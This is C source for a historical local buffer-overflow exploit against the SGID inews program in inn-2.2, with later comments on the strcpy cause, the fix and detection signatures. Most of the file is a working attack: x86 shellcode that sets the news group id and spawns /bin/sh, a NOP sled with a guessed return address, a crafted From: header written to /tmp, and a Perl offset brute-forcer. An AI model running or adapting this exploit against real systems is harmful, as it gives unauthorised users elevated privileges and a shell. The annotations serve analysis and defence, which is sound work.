- /* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[v9@fakehalo.org].
- this will give you a gid=news shell if /usr/bin/inews is SGID(news). i know
- /usr/bin/inews comes default with versions of redhat, but i don't know about
- other distributions.
-
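- cause (line601:inews.c): "(void)strcpy(from, HDR(_from));" copies the From:
- header with no length check. fix: bound the copy to the destination size and
- always NUL-terminate (strncpy() alone does not terminate on truncation).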
-
- note: i found this while looking for a security hole in another program that
- comes with inn, but it needs gid=news to run anyways. so this is a
- bonus. also, you may want to clean up the defined TMPFILE afterwards.
- after making this, i found another exploit of the same idea, this is
- much more functional though.
-
- the old perl script below for offset(s):
-
- #!/usr/bin/perl
- $i=$ARGV[0];
- while(1){
- print "offset: $i.\n";
- system("./inews_bof $i");
- $i+=100;
- } */
-
- #include <stdio.h>
- #define NEWSGID 13 // numeric group id of "news"; main() writes it into byte 10 of exec[].
- #define ALIGN 0 // index in bof[] where the repeated return-address words start.
- #define PATH "/usr/bin/inews" // path to the inews program that main() execs.
- #define TMPFILE "/tmp/bad.post" // article file main() writes and hands to inews with -h.
- #define SUBJECT "inews bug." // Subject: header value; required file filler.
- #define NEWSGROUP "alt.inn.bug" // Newsgroups: header value; required file filler.
- #define DEFAULT_OFFSET 650 // subtracted from the sampled stack pointer when argv[1] is absent.
-
- static char exec[]= /* Payload bytes that main() copies into the From: buffer. Byte 10 (the
-   "\x00" line) is a placeholder that main() overwrites with NEWSGID before use. The bytes
-   \x2f\x62\x69\x6e\x2f\x73\x68 near the end are ASCII "/bin/sh" and \xcd\x80 is the x86
-   int 0x80 instruction, so the code is 32-bit x86 Linux only; both byte runs can serve as
-   content signatures when inspecting submitted or spooled articles. */
- "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
- "\x00" // placeholder: group id of news is patched in here at runtime.
- "\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
- "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
- "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
- "\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
- "\x6e\x2f\x73\x68\x01"; // hex01 h00t!
-
- long esp(void) /* Reads the x86 %esp register into %eax; main() uses the result as the base
-   of its address guess. There is no return statement: the value reaches the caller only
-   because %eax is the return register in the x86-32 calling convention, so the result is
-   compiler- and architecture-dependent. */
- {
- __asm__("movl %esp,%eax");
- }
- int main(int argc,char **argv) /* Builds an article file (TMPFILE) whose From: header is a
-   600-byte binary buffer, then execs PATH on it with -h. argv[1], when present, replaces
-   DEFAULT_OFFSET. Specific to 32-bit x86 Linux (see esp() and the payload bytes).
-   For defenders: the observable is a From: header several hundred bytes long that contains
-   non-printable bytes (0x90 runs, the payload, a repeated 4-byte word); the flaw itself is
-   the strcpy() of that header cited in the file's opening comment, and the gid=news impact
-   applies only where inews is SGID news. NOTE(review): non-executable stacks and address
-   randomisation presumably defeat the fixed-offset guess below - confirm per platform. */
- {
- char bof[600]; // give or take a few. (528)
- int i,offset,gid=NEWSGID;
- long ret;
- FILE *inewsfile;
- if(argc>1)
- {
- offset=atoi(argv[1]); // caller-supplied offset; atoi() gives 0 on non-numeric input.
- }
- else
- {
- offset=DEFAULT_OFFSET;
- }
- ret=(esp()-offset); // guessed address: this process's stack pointer minus the offset.
- for(i=ALIGN;i<600;i+=4) // fill the buffer with the guessed address, one word every 4 bytes.
- {
- *(long *)&bof[i]=ret;
- }
- exec[10]=gid; // replace the "\x00" placeholder in the payload with the news gid.
- for(i=0;i<(600-strlen(exec)-100);i++) // overwrite the leading part of bof with 0x90 bytes.
- {
- *(bof+i)=0x90;
- }
- memcpy(bof+i,exec,strlen(exec)); // payload goes directly after the 0x90 run.
- unlink(TMPFILE); // remove any earlier copy of the article file.
- inewsfile=fopen(TMPFILE,"w"); // NOTE(review): result is not checked before the writes below.
- fprintf(inewsfile,"From: %s\n",bof); // required header; this is the field carrying the oversized value.
- fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
- fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
- fclose(inewsfile);
- printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
- if(execlp(PATH,"inews","-h",TMPFILE,0)) // execlp() returns only on failure.
- {
- printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
- exit(-1);
- }
- }
- /* www.hack.co.za [26 June 2000]*/